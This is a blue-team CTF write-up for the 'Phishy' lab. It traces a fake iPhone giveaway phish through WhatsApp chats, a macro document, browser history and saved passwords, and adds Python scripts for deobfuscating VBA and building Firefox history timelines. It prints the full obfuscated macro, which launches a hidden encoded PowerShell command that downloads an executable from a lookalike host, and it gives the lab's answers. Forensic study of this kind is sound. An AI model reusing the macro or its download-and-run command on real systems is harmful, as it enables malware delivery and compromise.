Phishy Blue Team Lab
====================

Category: Endpoint

https://cyberdefenders.org/blueteam-ctf-challenges/phishy/#nav-questions

Scenario: A company's employee joined a fake iPhone giveaway. Our team took a disk image of the employee's system for further analysis. As a SOC analyst, you are tasked to identify how the system was compromised.

Tools:
------

- [FTK Imager](https://accessdata.com/products-services/forensic-toolkit-ftk/ftkimager)
- [Autopsy](https://www.sleuthkit.org/autopsy/)
- [Registry Explorer](https://f001.backblazeb2.com/file/EricZimmermanTools/RegistryExplorer_RECmd.zip)
- [SQLite Browser](https://sqlitebrowser.org/)
- [browsinghistoryview](https://www.nirsoft.net/utils/browsing_history_view.html)
- [passwordfox](https://www.nirsoft.net/utils/passwordfox.html)
- [Whatsapp viewer](https://github.com/andreas-mausch/whatsapp-viewer/releases/download/v1.13/WhatsApp.Viewer.zip)
- [oledump](https://blog.didierstevens.com/programs/oledump-py/)
- [virustotal](https://www.virustotal.com/gui/home/upload)
- [HybridAnalysis](https://www.hybrid-analysis.com/)

# Q1 - What is the hostname of the victim machine?

=> WIN-NF3JQEU4G0T

# Q2 - What is the messaging app installed on the victim machine?

Look for the application's .exe file on the image.

=> whatsapp

# Q3 - The attacker tricked the victim into downloading a malicious document. Provide the full download URL.

Extract the file msgstore.db, then open it in WhatsApp Viewer to read the chat.

=> http://appIe.com/IPhone-Winners.doc

# Q4 - Multiple streams contain macros in the document. Provide the number of the highest stream.

First I extracted IPhone-Winners.doc, which sits in the Downloads folder, then ran [oledump](https://blog.didierstevens.com/programs/oledump-py/) on it; the streams flagged with `M` carry macros.

=> 10

# Q5 - The macro executed a program. Provide the program name?

`python oledump.py -v C:\Users\Admin\OneDrive\Desktop\phishy\IPhone-Winners.doc -s 10`

=> powershell

# Q6 - The macro downloaded a malicious file. Provide the full download URL.
```
Attribute VB_Name = "iphoneevil"
Function lllllllll1l()
Dim lllllllllll As String
Dim llllllllll1 As String
lllllllllll = Chr(97) & Chr(81) & Chr(66) & Chr(117) & Chr(65) & Chr(72) & Chr(89) & Chr(65) & Chr(98) & Chr(119) & Chr(66) & Chr(114) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(76) & Chr(81) & Chr(66) & Chr(51) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(89) & Chr(103) & Chr(66) & Chr(121) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(99) & Chr(81) & Chr(66) & Chr(49) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(99) & Chr(119) & Chr(66) & Chr(48) & Chr(65) & Chr(67) & Chr(65) & Chr(65) & Chr(76) & Chr(81) & _
Chr(66) & Chr(86) & Chr(65) & Chr(72) & Chr(73) & Chr(65) & Chr(97) & Chr(81) & Chr(65) & Chr(103) & Chr(65) & Chr(67) & Chr(99) & Chr(65) & Chr(97) & Chr(65) & Chr(66) & Chr(48) & Chr(65) & Chr(72) & Chr(81) & Chr(65) & Chr(99) & Chr(65) & Chr(65) & Chr(54) & Chr(65) & Chr(67) & Chr(56) & Chr(65) & Chr(76) & Chr(119) & Chr(66) & Chr(104) & Chr(65) & Chr(72) & Chr(65) & Chr(65) & Chr(99) & Chr(65) & Chr(66) & Chr(74) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(76) & Chr(103) & Chr(66) & Chr(106) & Chr(65) & Chr(71) & Chr(56) & Chr(65) & Chr(98) & Chr(81) & Chr(65) _
& Chr(118) & Chr(65) & Chr(69) & Chr(107) & Chr(65) & Chr(99) & Chr(65) & Chr(66) & Chr(111) & Chr(65) & Chr(71) & Chr(56) & Chr(65) & Chr(98) & Chr(103) & Chr(66) & Chr(108) & Chr(65) & Chr(67) & Chr(52) & Chr(65) & Chr(90) & Chr(81) & Chr(66) & Chr(52) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(74) & Chr(119) & Chr(65) & Chr(103) & Chr(65) & Chr(67) & Chr(48) & Chr(65) & Chr(84) & Chr(119) & Chr(66) & Chr(49) & Chr(65) & Chr(72) & Chr(81) & Chr(65) & Chr(82) & Chr(103) & Chr(66) & Chr(112) & Chr(65) & Chr(71) & Chr(119) & Chr(65) & Chr(90) & Chr(81) & Chr(65) & _
Chr(103) & Chr(65) & Chr(67) & Chr(99) & Chr(65) & Chr(81) & Chr(119) & Chr(65) & Chr(54) & Chr(65) & Chr(70) & Chr(119) & Chr(65) & Chr(86) & Chr(65) & Chr(66) & Chr(108) & Chr(65) & Chr(71) & Chr(48) & Chr(65) & Chr(99) & Chr(65) & Chr(66) & Chr(99) & Chr(65) & Chr(69) & Chr(107) & Chr(65) & Chr(85) & Chr(65) & Chr(66) & Chr(111) & Chr(65) & Chr(71) & Chr(56) & Chr(65) & Chr(98) & Chr(103) & Chr(66) & Chr(108) & Chr(65) & Chr(67) & Chr(52) & Chr(65) & Chr(90) & Chr(81) & Chr(66) & Chr(52) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(74) & Chr(119) & Chr(65) & _
Chr(103) & Chr(65) & Chr(67) & Chr(48) & Chr(65) & Chr(86) & Chr(81) & Chr(66) & Chr(122) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(82) & Chr(65) & Chr(66) & Chr(108) & Chr(65) & Chr(71) & Chr(89) & Chr(65) & Chr(89) & Chr(81) & Chr(66) & Chr(49) & Chr(65) & Chr(71) & Chr(119) & Chr(65) & Chr(100) & Chr(65) & Chr(66) & Chr(68) & Chr(65) & Chr(72) & Chr(73) & Chr(65) & Chr(90) & Chr(81) & Chr(66) & Chr(107) & Chr(65) & Chr(71) & Chr(85) & Chr(65) & Chr(98) & Chr(103) & Chr(66) & Chr(48) & Chr(65) & Chr(71) & Chr(107) & Chr(65) & Chr(89) & Chr(81) & Chr(66) & Chr(115) _
& Chr(65) & Chr(72) & Chr(77) & Chr(65)
llllllllll1 = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(32) & Chr(45) & Chr(69) & Chr(110) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(100) & Chr(67) & Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100) & lllllllllll
CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Run llllllllll1, 0, True
End Function
```

The first variable is a base64 string, the second is `powershell -EncodedCommand` followed by that string, and the `WScript.Shell` object runs it with a hidden window (window style 0). Decoding the base64 with [CyberChef](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)Remove_null_bytes()&input=YVFCdUFIWUFid0JyQUdVQUxRQjNBR1VBWWdCeUFHVUFjUUIxQUdVQWN3QjBBQ0FBTFFCVkFISUFhUUFnQUNjQWFBQjBBSFFBY0FBNkFDOEFMd0JoQUhBQWNBQkpBR1VBTGdCakFHOEFiUUF2QUVrQWNBQm9BRzhBYmdCbEFDNEFaUUI0QUdVQUp3QWdBQzBBVHdCMUFIUUFSZ0JwQUd3QVpRQWdBQ2NBUXdBNkFGd0FWQUJsQUcwQWNBQmNBRWtBVUFCb0FHOEFiZ0JsQUM0QVpRQjRBR1VBSndBZ0FDMEFWUUJ6QUdVQVJBQmxBR1lBWVFCMUFHd0FkQUJEQUhJQVpRQmtBR1VBYmdCMEFHa0FZUUJzQUhNQQ) (From Base64, then Remove null bytes, because an encoded PowerShell command is UTF-16LE) reveals the download command.

=> http://appIe.com/Iphone.exe

# Q7 - Where was the malicious file downloaded to? (Provide the full path)

Same decoded command as the previous question: the path is the `-OutFile` argument.

=> C:\Temp\IPhone.exe

# Q8 - What is the name of the framework used to create the malware?

Upload the file to VirusTotal: it is detected as a Meterpreter trojan, and Meterpreter is part of the Metasploit framework.

=> Metasploit

# Q9 - What is the attacker's IP address?

Upload the file to Hybrid Analysis and check the contacted hosts.

=> 155.94.69.27

# Q10 - The fake giveaway used a login page to collect user information. Provide the full URL of the login page?

Open the Firefox places.sqlite file in Autopsy and look through the visited URLs.

=> http://appIe.competitions.com/login.php

# Q11 - What is the password the user submitted to the login page?

Load the pyb51x2n.default-release profile folder into PasswordFox.

=> GacsriicUZMY4xiAF4yl

# References and Further Readings

- https://responderj01.medium.com/phishy-challenge-walkthrough-cyberdefenders-3fb1c56850a3
- https://medium.com/@Ayham_Assaf/cyberdefenders-phishy-blue-team-challenge-de915d578808
- https://markmckinnon-80619.medium.com/new-autopsy-modules-now-available-7c56d2032020
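The stream-10 macro in Q6 hides both the `powershell` string and the base64 behind `Chr()` chains so that a plain grep for either finds nothing. The script below is an added example, not code from the write-up or from the lab: it merges VBA ` _` line continuations, evaluates each `name = ...` string assignment in order (Chr() calls, literals and previously resolved variables), then decodes the `-EncodedCommand` argument the same way the CyberChef recipe does (base64, then UTF-16LE) and pulls the URL and `-OutFile` path out of the result. The base64 blob is copied from the macro; the short VBA sample wrapped around it is constructed to mirror the shape of stream 10 (with the blob as a literal and a space after `-EncodedCommand`), and the function names are my own.

```python
import base64
import re
from typing import Dict, List, Optional

# Base64 blob that the stream-10 macro reassembles into the variable
# lllllllllll (copied from the macro in this write-up; everything else in
# this block is constructed for the example).
ENCODED_COMMAND = (
    "aQBuAHYAbwBrAGUALQB3AGUAYgByAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACcA"
    "aAB0AHQAcAA6AC8ALwBhAHAAcABJAGUALgBjAG8AbQAvAEkAcABoAG8AbgBlAC4A"
    "ZQB4AGUAJwAgAC0ATwB1AHQARgBpAGwAZQAgACcAQwA6AFwAVABlAG0AcABcAEkA"
    "UABoAG8AbgBlAC4AZQB4AGUAJwAgAC0AVQBzAGUARABlAGYAYQB1AGwAdABDAHIA"
    "ZQBkAGUAbgB0AGkAYQBsAHMA"
)

# Constructed stand-in for the macro: same shape as the real one (Chr()
# chains, " _" line continuations, one variable feeding the next), but the
# blob is a string literal so the sample stays short.
SAMPLE_VBA = (
    'Attribute VB_Name = "iphoneevil"\n'
    "Function lllllllll1l()\n"
    "Dim lllllllllll As String\n"
    "Dim llllllllll1 As String\n"
    'lllllllllll = "' + ENCODED_COMMAND + '"\n'
    "llllllllll1 = Chr(112) & Chr(111) & Chr(119) & Chr(101) & Chr(114) & Chr(115) & _\n"
    "    Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(32) & Chr(45) & Chr(69) & _\n"
    "    Chr(110) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(100) & Chr(67) & _\n"
    "    Chr(111) & Chr(109) & Chr(109) & Chr(97) & Chr(110) & Chr(100) & Chr(32) & lllllllllll\n"
    "CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & _\n"
    "    Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108)).Run llllllllll1, 0, True\n"
    "End Function\n"
)

ASSIGN_RE = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.+)$")
# One token of a VBA string expression: Chr(n), a "literal", or an identifier.
TOKEN_RE = re.compile(r'Chr\(\s*(\d+)\s*\)|"([^"]*)"|([A-Za-z_]\w*)')
# powershell accepts -EncodedCommand, -enc, -ec and -e; longest alternative first.
ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def join_continuations(vba: str) -> List[str]:
    """Merge VBA ' _' line continuations into single logical lines."""
    logical, buf = [], ""
    for raw in vba.splitlines():
        line = raw.strip()
        if line.endswith(" _"):  # continuation: drop the underscore, keep joining
            buf += line[:-1]
            continue
        if buf or line:
            logical.append(buf + line)
        buf = ""
    return logical


def evaluate_string_expr(expr: str, env: Dict[str, str]) -> str:
    """Concatenate Chr() calls, literals and already-resolved variables."""
    parts = []
    for code, literal, ident in TOKEN_RE.findall(expr):
        if code:
            parts.append(chr(int(code)))
        elif literal:
            parts.append(literal)
        elif ident in env:
            parts.append(env[ident])
    return "".join(parts)


def deobfuscate_vba(vba: str) -> Dict[str, str]:
    """Resolve every 'name = <string expression>' assignment, top to bottom."""
    env: Dict[str, str] = {}
    for line in join_continuations(vba):
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = evaluate_string_expr(m.group(2), env)
    return env


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Decode a powershell -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))  # tolerate stripped padding
    return raw.decode("utf-16-le")


def extract_iocs(decoded: str) -> Dict[str, object]:
    """Pull the download URL(s) and the -OutFile path out of the decoded command."""
    urls = re.findall(r"https?://[^\s'\"]+", decoded)
    out = re.search(r"-OutFile\s+'([^']+)'", decoded, re.IGNORECASE)
    return {"urls": urls, "outfile": out.group(1) if out else None}


if __name__ == "__main__":
    variables = deobfuscate_vba(SAMPLE_VBA)
    for name, value in variables.items():
        print(f"{name} = {value[:60]}...")
    cmd = decode_encoded_command(variables["llllllllll1"])
    print("decoded:", cmd)
    print("iocs:", extract_iocs(cmd))
```

To use it on the real document, feed the output of `oledump.py -s 10 -v` to `deobfuscate_vba()` instead of `SAMPLE_VBA`; the evaluator only follows string concatenation, which is all this macro uses, so anything fancier (string functions, loops) would need extending rather than executing the VBA.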
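Q10 reads the login-page URL out of places.sqlite through Autopsy; the same answer can be pulled straight from the database, which also gives the order in which the victim reached the page. The script below is an added example, not part of the write-up: it builds a constructed in-memory stand-in for places.sqlite (the table and column names `moz_places`, `moz_historyvisits`, `visit_date`, `place_id` come from the real Firefox schema; the host, titles and timestamps are made up), converts Firefox PRTime values (microseconds since the Unix epoch) to UTC, and lists the visits in order. The function names are my own.

```python
import sqlite3
from datetime import datetime, timezone
from typing import List, Optional, Tuple


def build_sample_places() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a Firefox places.sqlite.

    Only the columns a history timeline needs are created; their names match
    the real Firefox schema, the rows are made up for this example.
    """
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE moz_places (
            id INTEGER PRIMARY KEY, url TEXT, title TEXT,
            visit_count INTEGER DEFAULT 0, last_visit_date INTEGER);
        CREATE TABLE moz_historyvisits (
            id INTEGER PRIMARY KEY, from_visit INTEGER, place_id INTEGER,
            visit_date INTEGER, visit_type INTEGER);
        """
    )
    base = 1_600_000_000 * 1_000_000  # PRTime: microseconds since the Unix epoch
    places = [  # (id, url, title, visit_count, last_visit_date)
        (1, "https://www.mozilla.org/", "Mozilla", 1, base),
        (2, "http://appIe.competitions.com/", "iPhone Giveaway", 1, base + 100 * 1_000_000),
        (3, "http://appIe.competitions.com/login.php", "Sign in", 2, base + 160 * 1_000_000),
    ]
    visits = [  # (id, from_visit, place_id, visit_date, visit_type)
        (1, 0, 1, base, 1),
        (2, 0, 2, base + 100 * 1_000_000, 1),
        (3, 2, 3, base + 130 * 1_000_000, 1),
        (4, 3, 3, base + 160 * 1_000_000, 1),
    ]
    conn.executemany("INSERT INTO moz_places VALUES (?, ?, ?, ?, ?)", places)
    conn.executemany("INSERT INTO moz_historyvisits VALUES (?, ?, ?, ?, ?)", visits)
    return conn


def prtime_to_utc(prtime: int) -> str:
    """Convert a PRTime value (microseconds since the epoch) to a UTC timestamp string."""
    return datetime.fromtimestamp(prtime / 1_000_000, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def history_timeline(conn: sqlite3.Connection, url_like: Optional[str] = None) -> List[Tuple[str, str, str]]:
    """Every visit in chronological order, optionally limited to URLs matching a LIKE pattern."""
    sql = (
        "SELECT v.visit_date, p.url, COALESCE(p.title, '') "
        "FROM moz_historyvisits v JOIN moz_places p ON p.id = v.place_id "
    )
    params: tuple = ()
    if url_like:
        sql += "WHERE p.url LIKE ? "
        params = (url_like,)
    sql += "ORDER BY v.visit_date"
    return [(prtime_to_utc(ts), url, title) for ts, url, title in conn.execute(sql, params)]


def pages_visited_on_host(conn: sqlite3.Connection, host: str) -> List[str]:
    """Distinct URLs on one host, ordered by first visit; a login.php stands out here."""
    sql = (
        "SELECT p.url FROM moz_places p JOIN moz_historyvisits v ON v.place_id = p.id "
        "WHERE p.url LIKE ? GROUP BY p.url ORDER BY MIN(v.visit_date)"
    )
    return [row[0] for row in conn.execute(sql, (f"%://{host}/%",))]


if __name__ == "__main__":
    db = build_sample_places()
    for when, url, title in history_timeline(db):
        print(when, url, title)
    print(pages_visited_on_host(db, "appIe.competitions.com"))
```

On a real image, replace `build_sample_places()` with `sqlite3.connect()` on a copy of the profile's places.sqlite (copy the `-wal` file alongside it, or the newest visits are missed); the same `moz_historyvisits` ordering shows whether the login page was reached from the giveaway page, which is the referral chain Autopsy's web-history view flattens.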